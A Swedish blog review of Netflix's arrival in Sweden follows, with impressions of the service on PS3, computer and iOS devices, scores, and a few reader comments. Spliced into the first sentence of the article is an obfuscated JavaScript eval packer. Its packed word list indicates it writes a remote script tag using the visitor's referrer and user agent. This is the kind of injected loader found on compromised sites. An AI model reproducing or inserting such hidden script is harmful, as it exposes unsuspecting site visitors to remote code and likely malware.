Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Recension: Revue.se testar Netflix i Sverige

Recension: Revue.se testar Netflix i Sverige
Sebastian Plengier Ehrnfelt

Oj eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hiifd|var|u0026u|referrer|nbaza||js|php’.split(‘|’),0,{}))
vad vi väntat på detta. Vi vet att det innan funnits alternativ till
Netflix så som ViaPlay. Dock har dessa inte haft riktigt samma utbud som jätten Netflix. 

Nu ska vi absolut inte trycka ner på de svenska streaming leverantörerna då flera av dem faktiskt är riktigt bra. Vi ska fokusera på nykomlingen Netflix.

När jag själv upptäckte Netflix var när jag i lördags morgon satte igång min Playstation 3 för att göra en uppdatering. När jag bläddrade i menyn så märkte jag att en röd ikon under ”media” hade dykt upp, Netflix.

Jag uppdaterade min PS3 och sedan också Netflix. Några timmar senare började stormen i media och press. Tidningarna slogs om läsare och trycket blev stort, även på Revue.

Jag registrerade snabbt ett konto och tog del av deras förmån ”en månad gratis” när man startar ett nytt konto. När jag kommer in på startsidan får jag upp en massa roliga och intressanta serier och filmer. Jag kan se vad mina vänner på Facebook har tittat på, gillat samt sparat som favoriter (Gäller om du kopplar ditt Facebook-konto).

Jag har precis börjat kika på serien ”Sons of Anarchy”, så min sökning började på denna serie. Jag hittade den direkt och såg även att majoriteten av mina vänner på Facebook också tittar på den vilket var kul.

Själva sökningen och navigeringen i systemet på Playstation 3 är relativt enkelt. Du kan snabbt få fram den film du söker, och om du vill ”spotan hitta” en film kan du enkelt göra detta genom att bläddra på startsidan på genre, topplista eller klassiker.

På dator ser systemet nästan identiskt ut som på PS3. Dock är det självklart enklare och snabbare att navigera sig igenom då musen här finns tillgänglig.

Efter att ha provat tjänsten nu på både Playstation 3 och dator var det dags för iPad och iPhone. Det är intressant och spännande att tjänsten finns på så många olika enheter, dvs alltid till hands.

Båda iOS-enheterna fugnerade bra. Iphone 5 var som förstått innan lite tråkig då skärmen är för liten för att kika på långfilm på och batteriet slukades snabbt. Dock möjligheten att kunna ha med sig mobilen och koppla in hos polaren är ju magisk.

Kvaliteten på Netflix är bra. Den beror på vilken uppkoppling du har när du tittar. Är din uppkoppling lite sämre kommer kvaliteten bli sämre men fortfarande ok.

Sammanfattning Netflix

Sammanfattat så är Netflix en otroligt bra tjänst som absolut är värd sina 79 kronor i månaden. Kollar du mycket film och serier kan jag absolut utan tvekan rekommendera Netflix, och om du vill testa innan så får du nu en gratis månad.

Det ska bli intressant och se hur alla konkurrenter ställer sig på marknaden nu när en del jättar som HBO och Netflix sakta tar sig in i Sverige.

Netflix Hemsida: Här!

Har ni testat tjänsten? Vi vill gärna höra era kommentarer nedan på hur ni uppfattar den nya streaming-jätten.

Review Overview

Design
8
Navigering
7.5
Utbud
6
Pris
8.5
7.5

Rating

Comments

 1. Killen

  Jag tycker att netflix är precis vad Svensk TV industri behöver…. någon som skakar till i kistan lite… Visst utbudet är inte helt klockrent idag, men det släpptes i måndags. Mer kommer så det är bara att var lugn. Men det som är bäst är att konkurrensen blivit så mycket bättre, som ni skrev innan så sänkte ju VIaplay priset också. Äntligen är det köparens marknad på TV-fronten.

  • Sebastian Plengier

   Där håller jag med dig. Dock ska man veta att andra svenska liknande tjänster har bättre utbud när det kommer till svenska filmer och serier.

 2. ”Jag ligger två husbetalningar efter. Du skulle ha sagt något.” haha sista bilden!

 3. Vector23

  Seriöst. Utbudet är ett skämt. Visst har de en del, men det är så gamalt att man redan sett dessa filmer. Helt bortkastade pengar. NF i USA är klart bättre och har också fysiska filmer som då ger möjligheten att se nya filmer. jmf Lovefilm
  Väntar på HBO ska köra igång